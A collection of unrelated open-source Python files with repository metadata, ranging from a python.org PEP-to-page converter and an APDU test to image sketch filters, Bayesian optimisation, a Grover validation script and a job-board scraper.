peps/converters.py | idjaw/pythondotorg | 0 | 1117 | import re
import os
from bs4 import BeautifulSoup
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.files import File
from pages.models import Page, Image
PEP_TEMPLATE = 'pages/pep-page.html'
pep_url = lambda num: 'dev/peps/pep-{}/'.format(num)
def check_paths():
""" Checks to ensure our PEP_REPO_PATH is setup correctly """
if not hasattr(settings, 'PEP_REPO_PATH'):
raise ImproperlyConfigured("No PEP_REPO_PATH in settings")
if not os.path.exists(settings.PEP_REPO_PATH):
raise ImproperlyConfigured("PEP_REPO_PATH in settings does not exist")
def convert_pep0():
"""
Take existing generated pep-0000.html and convert to something suitable
for a Python.org Page returns the core body HTML necessary only
"""
check_paths()
pep0_path = os.path.join(settings.PEP_REPO_PATH, 'pep-0000.html')
pep0_content = open(pep0_path).read()
soup = BeautifulSoup(pep0_content)
body_children = list(soup.body.children)
# Grab header and PEP body
header = body_children[3]
pep_content = body_children[7]
# Fix PEP links
body_links = pep_content.find_all("a")
pep_href_re = re.compile(r'pep-(\d+)\.html')
for b in body_links:
m = pep_href_re.search(b.attrs['href'])
# Skip anything not matching 'pep-XXXX.html'
if not m:
continue
b.attrs['href'] = '/dev/peps/pep-{}/'.format(m.group(1))
# Remove Version from header
header_rows = header.find_all('th')
for t in header_rows:
if 'Version:' in t.text and 'N/A' in t.next_sibling.text:
t.parent.extract()
return ''.join([header.prettify(), pep_content.prettify()])
def get_pep0_page(commit=True):
"""
Using convert_pep0 above, create a CMS ready pep0 page and return it
pep0 is used as the directory index, but it's also an actual pep, so we
return both Page objects.
"""
pep0_content = convert_pep0()
pep0_page, _ = Page.objects.get_or_create(path='dev/peps/')
pep0000_page, _ = Page.objects.get_or_create(path='dev/peps/pep-0000/')
for page in [pep0_page, pep0000_page]:
page.content = pep0_content
page.content_markup_type = 'html'
page.title = "PEP 0 -- Index of Python Enhancement Proposals (PEPs)"
page.template_name = PEP_TEMPLATE
if commit:
page.save()
return pep0_page, pep0000_page
def fix_headers(soup, data):
""" Remove empty or unwanted headers and find our title """
header_rows = soup.find_all('th')
for t in header_rows:
if 'Version:' in t.text:
if t.next_sibling.text == '$Revision$':
t.parent.extract()
if t.next_sibling.text == '':
t.parent.extract()
if 'Last-Modified:' in t.text:
if '$Date$'in t.next_sibling.text:
t.parent.extract()
if t.next_sibling.text == '':
t.parent.extract()
if t.text == 'Title:':
data['title'] = t.next_sibling.text
if t.text == 'Content-Type:':
t.parent.extract()
if 'Version:' in t.text and 'N/A' in t.next_sibling.text:
t.parent.extract()
return soup, data
def convert_pep_page(pep_number, content):
"""
Handle different formats that pep2html.py outputs
"""
check_paths()
data = {
'title': None,
}
if '<html>' in content:
soup = BeautifulSoup(content)
data['title'] = soup.title.text
if not re.search(r'PEP \d+', data['title']):
data['title'] = 'PEP {} -- {}'.format(
pep_number,
soup.title.text,
)
header = soup.body.find('div', class_="header")
header, data = fix_headers(header, data)
data['header'] = header.prettify()
main_content = soup.body.find('div', class_="content")
data['main_content'] = main_content.prettify()
data['content'] = ''.join([
data['header'],
data['main_content']
])
else:
soup = BeautifulSoup(content)
soup, data = fix_headers(soup, data)
if not data['title']:
data['title'] = "PEP {} -- ".format(pep_number)
else:
if not re.search(r'PEP \d+', data['title']):
data['title'] = "PEP {} -- {}".format(
pep_number,
data['title'],
)
data['content'] = soup.prettify()
# Fix PEP links
pep_content = BeautifulSoup(data['content'])
body_links = pep_content.find_all("a")
pep_href_re = re.compile(r'pep-(\d+)\.html')
for b in body_links:
m = pep_href_re.search(b.attrs['href'])
# Skip anything not matching 'pep-XXXX.html'
if not m:
continue
b.attrs['href'] = '/dev/peps/pep-{}/'.format(m.group(1))
data['content'] = pep_content.prettify()
hg_link = "https://hg.python.org/peps/file/tip/pep-{0}.txt".format(pep_number)
data['content'] += """Source: <a href="{0}">{0}</a>""".format(hg_link)
return data
def get_pep_page(pep_number, commit=True):
"""
Given a pep_number retrieve original PEP source text, rst, or html.
Get or create the associated Page and return it
"""
pep_path = os.path.join(settings.PEP_REPO_PATH, 'pep-{}.html'.format(pep_number))
    if not os.path.exists(pep_path):
        print("PEP Path '{}' does not exist, skipping".format(pep_path))
        return None
pep_content = convert_pep_page(pep_number, open(pep_path).read())
pep_page, _ = Page.objects.get_or_create(path=pep_url(pep_number))
# Remove leading zeros from PEP number for display purposes
pep_number_string = str(pep_number)
pep_number_string = re.sub(r'^0+', '', pep_number_string)
pep_page.title = pep_content['title']
pep_page.content = pep_content['content']
pep_page.content_markup_type = 'html'
pep_page.template_name = PEP_TEMPLATE
if commit:
pep_page.save()
return pep_page
def add_pep_image(pep_number, path):
image_path = os.path.join(settings.PEP_REPO_PATH, path)
    if not os.path.exists(image_path):
        print("Image Path '{}' does not exist, skipping".format(image_path))
        return None
try:
page = Page.objects.get(path=pep_url(pep_number))
except Page.DoesNotExist:
print("Could not find backing PEP {}".format(pep_number))
return
# Find existing images, we have to loop here as we can't use the ORM
# to query against image__path
existing_images = Image.objects.filter(page=page)
MISSING = False
FOUND = False
for image in existing_images:
image_root_path = os.path.join(settings.MEDIA_ROOT, page.path, path)
if image.image.path.endswith(path):
FOUND = True
# File is missing on disk, recreate
if not os.path.exists(image_root_path):
MISSING = image
break
if not FOUND or MISSING:
image = None
if MISSING:
image = MISSING
else:
image = Image(page=page)
with open(image_path, 'rb') as image_obj:
image.image.save(path, File(image_obj))
image.save()
# Old images used to live alongside html, but now they're in different
# places, so update the page accordingly.
soup = BeautifulSoup(page.content.raw)
for img_tag in soup.findAll('img'):
if img_tag['src'] == path:
img_tag['src'] = os.path.join(settings.MEDIA_URL, page.path, path)
page.content.raw = soup.prettify()
page.save()
return image
def get_peps_rss():
rss_feed = os.path.join(settings.PEP_REPO_PATH, 'peps.rss')
if not os.path.exists(rss_feed):
return
page, _ = Page.objects.get_or_create(
path="dev/peps/peps.rss",
template_name="pages/raw.html",
)
with open(rss_feed, "r") as rss_content:
content = rss_content.read()
page.content = content
page.is_published = True
page.content_type = "application/rss+xml"
page.save()
return page
| 2.296875 | 2 |
venv/Lib/site-packages/toolz/sandbox/__init__.py | ajayiagbebaku/NFL-Model | 3,749 | 1118 | from .core import EqualityHashKey, unzip
from .parallel import fold
| 1.148438 | 1 |
interface/app/__init__.py | caglorithm/accel | 31 | 1119 | from flask import Flask
app = Flask(__name__, static_folder='static')
from app import routes
| 1.578125 | 2 |
implementations/python3/tests/CAPDU.py | sebastien-riou/SATL | 4 | 1120 | <reponame>sebastien-riou/SATL
import os
import pysatl
from pysatl import CAPDU
if __name__ == "__main__":
def check(hexstr, expected):
capdu = CAPDU.from_hexstr(hexstr)
if capdu != expected:
raise Exception("Mismatch for input '"+hexstr+"'\nActual: "+str(capdu)+"\nExpected: "+str(expected))
    def gencase(*, LC, LE):
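        # Build a random APDU body and the expected ISO 7816-4 hex encoding: short-form
        # Lc/Le fit in one byte, extended form uses two-byte lengths (with a leading
        # 0x00 marker), and an extended case-4 APDU forces both Lc and Le extended.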
assert(LC < 0x10000)
assert(LE <= 0x10000)
data = os.getrandom(LC)
hexstr = "00112233"
case4 = LC>0 and LE>0
case4e = case4 and (LC>0xFF or LE>0x100)
if LC>0:
if LC>0xFF or case4e:
hexstr += "00%04X"%LC
else:
hexstr += "%02X" % LC
hexstr += pysatl.Utils.hexstr(data, separator="")
if LE>0:
if case4e:
if LE == 0x10000:
hexstr += "0000"
else:
hexstr += "%04X"%LE
elif LE == 0x10000:
hexstr += "000000"
elif LE>0x100:
hexstr += "00%04X"%LE
elif LE == 0x100:
hexstr += "00"
else:
hexstr += "%02X" % LE
expected = hexstr
capdu = CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33, DATA=data, LE=LE)
hexstr = capdu.to_hexstr()
if hexstr != expected:
raise Exception("Mismatch for LC=%d, LE=%d"%(LC,LE)+"\nActual: "+hexstr+"\nExpected: "+expected)
b = capdu.to_bytes()
assert(type(b) is bytes)
return (hexstr, capdu)
#check __repr__
expected = "pysatl.CAPDU.from_hexstr('00112233015502')"
capdu=None
exec("capdu="+expected)
assert(expected==repr(capdu))
#check well formed inputs
check("00112233", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("00 11 22 33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("0x00,0x11,0x22,0x33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
#check we tolerate less well formed inputs
check("00-11,22_33", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("""0x00 0x11 0x22
0x33""", CAPDU(CLA=0x00, INS=0x11, P1=0x22, P2=0x33))
check("1 2 304", CAPDU(CLA=0x01, INS=0x02, P1=0x03, P2=0x04))
LC_cases = [0,1,2,254,255,256,257,65534,65535]
LE_cases = LC_cases + [65536]
for LC in LC_cases:
for LE in LE_cases:
print(LC,LE)
check(*gencase(LC=LC, LE=LE))
| 2.84375 | 3 |
src/mgls_bootstrapping.py | rosich/mgls | 0 | 1121 | <filename>src/mgls_bootstrapping.py
#!/usr/bin/python
from math import sin, cos, tan, atan, pi, acos, sqrt, exp, log10
import sys, os
import copy
import random
import numpy as np
import multiprocessing as mp
import ConfigParser
sys.path.append('./bin')
import mGLS, mMGLS
sys.path.append('./src')
from EnvGlobals import Globals
import mgls_io
import mgls_mc
from mgls_lib import *
#definitions and constants
to_radians = pi/180.0
to_deg = 1.0/to_radians
#-------------------------
def _gls_instance_Ndim_bootstrapping(n_runs):
"""executes n_runs instances of MGLS for with previous data shuffle
"""
cpu_periodogram = list()
for iter in range(n_runs):
"""
#shuffle RV's and their errors. Repetition is not allowed
comb_rv_err = zip(Globals.rv, Globals.rv_err)
random.shuffle(comb_rv_err)
Globals.rv[:], Globals.rv_err[:] = zip(*comb_rv_err)
"""
#allowing repetition
rv = [0.0]*len(Globals.time)
rv_err = [0.0]*len(Globals.time)
for i in range(len(Globals.time)):
index = int(random.uniform(0,len(Globals.time)))
rv[i] = Globals.rv[index]
rv_err[i] = Globals.rv_err[index]
Globals.rv = rv
Globals.rv_err = rv_err
opt_state = mgls_mc.optimal(Globals.ndim, msgs = False, temp_steps=20, n_iter=1000)
pwr_opt, fitting_coeffs, A = mgls(opt_state)
cpu_periodogram.append(pwr_opt) #save the best period determination (highest power)
return cpu_periodogram
def fap(bootstrapping_stats, pwr):
"""returns FAP for a given pwr. i.e. how many realizations overcome
a given power, over unit.
"""
return float(sum(i > pwr for i in bootstrapping_stats))/len(bootstrapping_stats)
def fap_levels(bootstrapping_stats):
"""determines which power a FAP of 1, 0.1, 0.01 % is reached
"""
FAPs = [1.0, 0.1, 0.01, 0.001] #FAPS to compute in %
n_bs = len(bootstrapping_stats)
#sort bootstrapping_stats vector ascendently
sorted_pwr = sorted(bootstrapping_stats)
return [np.percentile(sorted_pwr,100-FAPs[i]) for i in range(len(FAPs))]
def parallel_Mdim_bootstrapping(n_bootstrapping):
"""
"""
n_runs = [n_bootstrapping/Globals.ncpus for i in range(Globals.ncpus)]
pool = mp.Pool(Globals.ncpus) #ncpus available
#run parallell execution
try:
out = pool.map_async(_gls_instance_Ndim_bootstrapping, n_runs).get(1./.0001)
pool.terminate()
except KeyboardInterrupt:
pool.terminate()
sys.exit()
"""
except ZeroDivisionError:
print "Error: Zero division error. Restarted parallel bootstapping"
"""
#join the output bunches
out_spectra = list()
for cpu in range(len(n_runs)):
out_spectra.extend(out[cpu])
bootstrapping_stats = list()
for j in range(len(out_spectra)):
bootstrapping_stats.append(out_spectra[j])
return bootstrapping_stats
def parallel_bootstrapping(n_bootstrapping):
"""
"""
n_runs = [n_bootstrapping/Globals.ncpus for i in range(Globals.ncpus)]
pool = mp.Pool(Globals.ncpus) #ncpus available
#run parallell execution
try:
out = pool.map_async(_gls_instance_bootstrapping, n_runs).get(1./.00001)
pool.terminate()
except KeyboardInterrupt:
pool.terminate()
sys.exit()
#join the output bunches
out_spectra = list()
for cpu in range(len(n_runs)):
out_spectra.extend(out[cpu])
bootstrapping_stats = list()
for j in range(len(out_spectra)):
bootstrapping_stats.append(out_spectra[j])
return bootstrapping_stats
def Mdim_bootstrapping(max_pow):
"""
"""
#n_bootstrapping = 500 #iterations
bootstrapping_stats = parallel_Mdim_bootstrapping(Globals.n_bootstrapping)
print "\n//BOOTSTRAPPING:// {1.0, 0.1, 0.01, 0.001}%"
print "FAP Levels:", fap_levels(bootstrapping_stats)
print "Total bootstapping samples: ", len(bootstrapping_stats)
return bootstrapping_stats
| 2.171875 | 2 |
mgmt/src/constants.py | pcaruana/sombrio | 0 | 1122 | #! /usr/bin/env python3
"""
constants.py - Contains all constants used by the device manager
Author:
- <NAME> (<EMAIL> at <EMAIL> dot <EMAIL>)
Date: 12/3/2016
"""
number_of_rows = 3 # total number rows of Index Servers
number_of_links = 5 # number of links to be sent to Crawler
number_of_chunks = 5 # number of chunks to be sent to Index Builder
number_of_comps = 10 # number of components managed by each watchdog
| 1.242188 | 1 |
XDoG/XDoG.py | STomoya/sketchify | 0 | 1123 | <filename>XDoG/XDoG.py
import cv2
import numpy as np
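# Difference of Gaussians (DoG): subtract a wider Gaussian blur (sigma * k) from a
# narrower one (sigma); gamma weights the wider blur's contribution.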
def DoG(image, size, sigma, k=1.6, gamma=1.):
g1 = cv2.GaussianBlur(image, (size, size), sigma)
g2 = cv2.GaussianBlur(image, (size, size), sigma*k)
return g1 - gamma * g2
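# XDoG (eXtended DoG): normalize the DoG response, then apply a steep tanh soft
# threshold controlled by eps and phi to get a sketch-like, near-binary edge image.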
def XDoG(image, size, sigma, eps, phi, k=1.6, gamma=1.):
eps /= 255
d = DoG(image, size, sigma, k, gamma)
d /= d.max()
e = 1 + np.tanh(phi * (d - eps))
e[e >= 1] = 1
return e * 255
# This config is found by the author
# modify if not the desired output
XDoG_config = dict(
size=0,
sigma=0.6,
eps=-15,
phi=10e8,
k=2.5,
gamma=0.97
)
def gen_xdog_image(src, dst):
gray = cv2.imread(src, cv2.IMREAD_GRAYSCALE)
# I wanted the gamma between [0.97, 0.98]
# but it depends on the image so I made it move randomly
# comment out if this is not needed
XDoG_config['gamma'] += 0.01 * np.random.rand(1)
dogged = XDoG(gray, **XDoG_config)
cv2.imwrite(dst, dogged)
if __name__ == "__main__":
gen_xdog_image('sample.jpg', 'dog.jpg') | 2.6875 | 3 |
lm/validate.py | ericlin8545/grover | 864 | 1124 | <reponame>ericlin8545/grover
# Original work Copyright 2018 The Google AI Language Team Authors.
# Modified work Copyright 2019 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from lm.modeling import model_fn_builder, GroverConfig
import tensorflow as tf
from lm.dataloader import input_fn_builder
import numpy as np
import tempfile
import h5py
from google.cloud import storage
flags = tf.flags
FLAGS = flags.FLAGS
## Required parameters
flags.DEFINE_string(
"config_file", 'configs/base.json',
"The config json file corresponding to the pre-trained news model. "
"This specifies the model architecture.")
flags.DEFINE_string(
"input_file", None,
"Input TF example files (can be a glob or comma separated).")
flags.DEFINE_string(
"output_dir", None,
"The output directory where the model checkpoints will be written.")
flags.DEFINE_string(
"validation_name", 'preds.h5',
"Name to use")
## Other parameters
flags.DEFINE_string(
"init_checkpoint", None,
"Initial checkpoint (usually from a pre-trained model).")
flags.DEFINE_integer(
"max_seq_length", 1024,
"The maximum total input sequence length after WordPiece tokenization. "
"Sequences longer than this will be truncated, and sequences shorter "
"than this will be padded. Must match data generation.")
flags.DEFINE_integer("iterations_per_loop", 1000,
"How many steps to make in each estimator call.")
flags.DEFINE_integer("batch_size", 32, "Batch size used for eval")
flags.DEFINE_bool("use_tpu", False, "Whether to use TPU or GPU/CPU.")
flags.DEFINE_string(
"tpu_name", None,
"The Cloud TPU to use for training. This should be either the name "
"used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 "
"url.")
flags.DEFINE_string(
"tpu_zone", None,
"[Optional] GCE zone where the Cloud TPU is located in. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
flags.DEFINE_string(
"gcp_project", None,
"[Optional] Project name for the Cloud TPU-enabled project. If not "
"specified, we will attempt to automatically detect the GCE project from "
"metadata.")
flags.DEFINE_string("master", None, "[Optional] TensorFlow master URL.")
flags.DEFINE_integer(
"num_tpu_cores", 8,
"Only used if `use_tpu` is True. Total number of TPU cores to use.")
# This is a handy little utility so that we can save the perplexities to TPU
class gcloudwriter():
def __init__(self, gcloud_name):
assert gcloud_name.startswith('gs://')
self.gcloud_name = gcloud_name
bucket_name, blob_name = gcloud_name.split('gs://')[1].split('/', 1)
bucket = storage.Client().get_bucket(bucket_name)
self.blob = bucket.blob(blob_name)
def __enter__(self):
self.tempfile = tempfile.NamedTemporaryFile()
return self.tempfile
def __exit__(self, *args):
self.tempfile.flush()
print("UPLOADING TO {}".format(self.gcloud_name), flush=True)
self.blob.upload_from_filename(self.tempfile.name)
self.tempfile.close()
def ind_where(array: np.ndarray, target, return_first_match=True, default_value=-1):
"""
:param array: Single dimension array
:param target: target to search for
:param return_first_match: If true, return the first index that matches, otherwise, return the last one
:param default_value: Index to return if there was no match
:return: index of the first match, or -1 if nothing
"""
assert array.ndim == 1
matching_inds = np.where(array == target)[0]
if len(matching_inds) > 0:
if return_first_match:
return int(matching_inds[0])
else:
return int(matching_inds[-1])
return default_value
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
news_config = GroverConfig.from_json_file(FLAGS.config_file)
tf.gfile.MakeDirs(FLAGS.output_dir)
input_files = []
for input_pattern in FLAGS.input_file.split(","):
input_files.extend(tf.gfile.Glob(input_pattern))
tf.logging.info("*** Input Files ***")
for input_file in input_files:
tf.logging.info(" %s" % input_file)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.iterations_per_loop,
keep_checkpoint_max=None,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
model_fn = model_fn_builder(news_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=1e-4,
num_train_steps=0,
num_warmup_steps=0,
use_tpu=FLAGS.use_tpu,
)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.batch_size,
eval_batch_size=FLAGS.batch_size,
predict_batch_size=FLAGS.batch_size,
params={'model_dir': FLAGS.output_dir}
)
eval_input_fn = input_fn_builder(
input_files=input_files,
seq_length=FLAGS.max_seq_length,
evaluate_for_fixed_number_of_steps=False,
num_cpu_threads=1,
is_training=False)
result = [x for x in estimator.predict(input_fn=eval_input_fn, yield_single_examples=True)]
cats = sorted(result[0].keys())
result_stack = {cat: np.stack([x[cat] for x in result]) for cat in cats}
with gcloudwriter(os.path.join(FLAGS.output_dir, FLAGS.validation_name)) as tempfile_name:
with h5py.File(tempfile_name, 'w') as h5:
for cat, data in result_stack.items():
dtype2use = np.float16 if cat.endswith(('logprobs', 'top_p_required')) else np.uint16
h5.create_dataset(cat, data=data.astype(dtype2use))
h5.create_dataset('model', data=FLAGS.config_file)
h5.create_dataset('ckpt', data=FLAGS.init_checkpoint)
h5.create_dataset('input_file', data=FLAGS.input_file)
# This gives the perplexity of the entire article. if you want to replicate the results of the paper you
# might need to do something different to extract the ppl of just the body in particular.
ppl_ex = []
for logprobs_i, ids_i in zip(result_stack['gt_logprobs'], result_stack['labels']):
# Omit the first token. Keep in mind input_ids is shifted by 1
start_ind = ind_where(ids_i, target=50265, default_value=0)
end_ind = ind_where(ids_i, target=50266, default_value=ids_i.shape[0] - 1)
ppl_ex.append(logprobs_i[start_ind:end_ind])
ppl_ex = np.concatenate(ppl_ex, 0)
print("Article perplexity is {:.3f}".format(np.exp(-np.mean(ppl_ex))), flush=True)
if __name__ == "__main__":
flags.mark_flag_as_required("input_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| 1.835938 | 2 |
robo/fmin/entropy_search.py | fuhuifang/RoBo | 0 | 1125 | import logging
import george
import numpy as np
from robo.priors.default_priors import DefaultPrior
from robo.models.gaussian_process import GaussianProcess
from robo.models.gaussian_process_mcmc import GaussianProcessMCMC
from robo.maximizers.random_sampling import RandomSampling
from robo.maximizers.scipy_optimizer import SciPyOptimizer
from robo.maximizers.differential_evolution import DifferentialEvolution
from robo.solver.bayesian_optimization import BayesianOptimization
from robo.acquisition_functions.information_gain import InformationGain
from robo.acquisition_functions.ei import EI
from robo.acquisition_functions.marginalization import MarginalizationGPMCMC
from robo.initial_design import init_latin_hypercube_sampling
logger = logging.getLogger(__name__)
def entropy_search(objective_function, lower, upper, num_iterations=30,
maximizer="random", model="gp_mcmc",
n_init=3, output_path=None, rng=None):
"""
Entropy search for global black box optimization problems. This is a reimplemenation of the entropy search
algorithm by Henning and Schuler[1].
[1] Entropy search for information-efficient global optimization.
<NAME> and <NAME>.
JMLR, (1), 2012.
Parameters
----------
objective_function: function
The objective function that is minimized. This function gets a numpy array (D,) as input and returns
the function value (scalar)
lower: np.ndarray (D,)
The lower bound of the search space
upper: np.ndarray (D,)
The upper bound of the search space
num_iterations: int
The number of iterations (initial design + BO)
maximizer: {"random", "scipy", "differential_evolution"}
Defines how the acquisition function is maximized.
model: {"gp", "gp_mcmc"}
The model for the objective function.
n_init: int
Number of points for the initial design. Make sure that it is <= num_iterations.
output_path: string
Specifies the path where the intermediate output after each iteration will be saved.
If None no output will be saved to disk.
rng: numpy.random.RandomState
Random number generator
Returns
-------
dict with all results
"""
assert upper.shape[0] == lower.shape[0], "Dimension miss match"
assert np.all(lower < upper), "Lower bound >= upper bound"
assert n_init <= num_iterations, "Number of initial design point has to be <= than the number of iterations"
if rng is None:
rng = np.random.RandomState(np.random.randint(0, 10000))
cov_amp = 2
n_dims = lower.shape[0]
initial_ls = np.ones([n_dims])
exp_kernel = george.kernels.Matern52Kernel(initial_ls,
ndim=n_dims)
kernel = cov_amp * exp_kernel
prior = DefaultPrior(len(kernel) + 1)
n_hypers = 3 * len(kernel)
if n_hypers % 2 == 1:
n_hypers += 1
if model == "gp":
gp = GaussianProcess(kernel, prior=prior, rng=rng,
normalize_output=False, normalize_input=True,
lower=lower, upper=upper)
elif model == "gp_mcmc":
gp = GaussianProcessMCMC(kernel, prior=prior,
n_hypers=n_hypers,
chain_length=200,
burnin_steps=100,
normalize_input=True,
normalize_output=False,
rng=rng, lower=lower, upper=upper)
else:
print("ERROR: %s is not a valid model!" % model)
return
a = InformationGain(gp, lower=lower, upper=upper, sampling_acquisition=EI)
if model == "gp":
acquisition_func = a
elif model == "gp_mcmc":
acquisition_func = MarginalizationGPMCMC(a)
if maximizer == "random":
max_func = RandomSampling(acquisition_func, lower, upper, rng=rng)
elif maximizer == "scipy":
max_func = SciPyOptimizer(acquisition_func, lower, upper, rng=rng)
elif maximizer == "differential_evolution":
max_func = DifferentialEvolution(acquisition_func, lower, upper, rng=rng)
else:
print("ERROR: %s is not a valid function to maximize the acquisition function!" % maximizer)
return
bo = BayesianOptimization(objective_function, lower, upper, acquisition_func, gp, max_func,
initial_design=init_latin_hypercube_sampling,
initial_points=n_init, rng=rng, output_path=output_path)
x_best, f_min = bo.run(num_iterations)
results = dict()
results["x_opt"] = x_best
results["f_opt"] = f_min
results["incumbents"] = [inc for inc in bo.incumbents]
results["incumbent_values"] = [val for val in bo.incumbents_values]
results["runtime"] = bo.runtime
results["overhead"] = bo.time_overhead
results["X"] = [x.tolist() for x in bo.X]
results["y"] = [y for y in bo.y]
return results
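# Illustrative usage sketch (objective function and bounds are made up for the example):
#
#     import numpy as np
#     results = entropy_search(lambda x: float(np.sum(x ** 2)),
#                              lower=np.array([-5.0]), upper=np.array([5.0]),
#                              num_iterations=10, n_init=3)
#     print(results["x_opt"], results["f_opt"])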
| 2.453125 | 2 |
biserici_inlemnite/app/migrations/0096_bisericapage_datare_an.py | ck-tm/biserici-inlemnite | 0 | 1126 | # Generated by Django 3.1.13 on 2021-10-29 11:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('app', '0095_bisericapage_utitle'),
]
operations = [
migrations.AddField(
model_name='bisericapage',
name='datare_an',
field=models.IntegerField(blank=True, null=True),
),
]
| 1.507813 | 2 |
services/core-api/app/api/mms_now_submissions/models/surface_bulk_sample_activity.py | bcgov/mds | 25 | 1127 | <reponame>bcgov/mds
from app.api.utils.models_mixins import Base
from app.extensions import db
class MMSSurfaceBulkSampleActivity(Base):
__tablename__ = "surface_bulk_sample_activity"
__table_args__ = {"schema": "mms_now_submissions"}
id = db.Column(db.Integer, primary_key=True)
messageid = db.Column(db.Integer, db.ForeignKey('mms_now_submissions.application.messageid'))
mms_cid = db.Column(db.Integer)
type = db.Column(db.String)
disturbedarea = db.Column(db.Numeric(14, 2))
timbervolume = db.Column(db.Numeric(14, 2))
quantity = db.Column(db.Integer)
def __repr__(self):
return '<MMSSurfaceBulkSampleActivity %r>' % self.id
| 1.96875 | 2 |
lgtv_rs232/commands/remote_control/remote_control_lock.py | davo22/lgtv_rs232 | 0 | 1128 | from enum import Enum
class RemoteControlLock(Enum):
OFF = 0
ON = 1
def map_to_state(data: int):
return RemoteControlLock(data)
class RemoteControlLockCommands(object):
_command = "km"
def __init__(self, send_command):
self._send_command = send_command
async def get_state(self):
return map_to_state(await self._send_command(self._command, 255))
async def set_state(self, state: RemoteControlLock):
return map_to_state(await self._send_command(self._command, state.value))
def on(self):
return self.set_state(RemoteControlLock.ON)
def off(self):
return self.set_state(RemoteControlLock.OFF)
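
# A small usage sketch (not part of the original module). RemoteControlLockCommands only
# needs an async send_command(command, data) callable, so a stub is enough to try the API.
if __name__ == "__main__":
    import asyncio

    async def fake_send_command(command, data):
        # Echo the requested state back; answer "off" (0) to the status query (255).
        return 0 if data == 255 else data

    async def demo():
        lock = RemoteControlLockCommands(fake_send_command)
        print(await lock.get_state())   # RemoteControlLock.OFF
        print(await lock.on())          # RemoteControlLock.ON

    asyncio.run(demo())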
| 3.109375 | 3 |
com/bridgelabz/programs/powerof2.py | aashishogale/FunctionalPrograms-Python- | 0 | 1129 | <reponame>aashishogale/FunctionalPrograms-Python-
import sys
from com.bridgelabz.utility.Utility import Utility
class PowerOf2:
def start(self):
number=int(sys.argv[1])
print(number)
for i in Utility().powerof2(number):
print(i)
return
PowerOf2().start() | 3.09375 | 3 |
app/main.py | MichaelLeeman/Job_Web_Scraper | 0 | 1130 | <filename>app/main.py<gh_stars>0
# This program scrapes data from job postings on the website workinstartups.com and appends it to an excel worksheet.
import os
from datetime import datetime, timedelta
from selenium import webdriver
from app import web_scraper
from app import excel
job_list, last_date = [], None
file_path = os.path.abspath("main.py").rstrip('/app/main.py') + '//Workbooks' + "//Job_Openings.xlsx"
print("-" * 75, "-" * 75, "\n\t\t\t\t\t\t\t JOB WEB SCRAPER", "-" * 75, "-" * 75, sep="\n")
print("\n")
# If the Job_Openings workbook already exists then append the jobs not already in the worksheet
# by checking the date of the first job in excel, since the last time the site was scraped.
if os.path.isfile(file_path):
print("Job_Opening excel file already exists. Loading workbook.", "-" * 75, sep="\n")
workbook, worksheet = excel.load_xlsx(file_path)
last_scrape_date = excel.get_first_job_date(worksheet)
last_scrape_date = datetime.strptime(last_scrape_date, "%d-%b-%Y")
# If not, create a new workbook and append all of the jobs posted within the month
else:
print("Creating new Excel workbook.", "-" * 75, sep="\n")
current_date = datetime.today()
date_month_ago = current_date - timedelta(weeks=4.348) # Average amount of weeks in a month
last_scrape_date = date_month_ago.replace(hour=0, minute=0, second=0, microsecond=0) # default to midnight
workbook, worksheet = excel.init_xlsx(worksheet_title="Job Openings")
# Open webdriver to workinstartups.com and create soup
print("Creating soup and opening Chrome webdriver", "-"*75, sep="\n")
URL = "https://workinstartups.com/job-board/jobs-in/london"
soup = web_scraper.soup_creator(URL, max_retry=1, sleep_time=0)
driver = webdriver.Chrome('./chromedriver')
driver.get(URL)
driver.find_element_by_link_text('Close').click()
# Scrape the jobs from workinstartups.com and update the worksheet with the found jobs
print("Scraping jobs from workinstartups.com. Please wait.", "-" * 75, sep="\n")
job_list = web_scraper.search_for_jobs(soup, last_scrape_date, driver)
print("Scraping finished. Updating and saving Excel workbook.", "-" * 75, sep="\n")
driver.close()
excel.update_xlsx(worksheet, job_list)
excel.save_xlsx(workbook, file_path)
print("Finished!", sep="\n")
| 3.46875 | 3 |
src/trusted/validator_arm/dgen_output.py | kapkic/native_client | 1 | 1131 | #!/usr/bin/python2
#
# Copyright (c) 2012 The Native Client Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
"""
Some common boilerplates and helper functions for source code generation
in files dgen_test_output.py and dgen_decode_output.py.
"""
HEADER_BOILERPLATE ="""/*
* Copyright 2013 The Native Client Authors. All rights reserved.
* Use of this source code is governed by a BSD-style license that can
* be found in the LICENSE file.
*/
// DO NOT EDIT: GENERATED CODE
"""
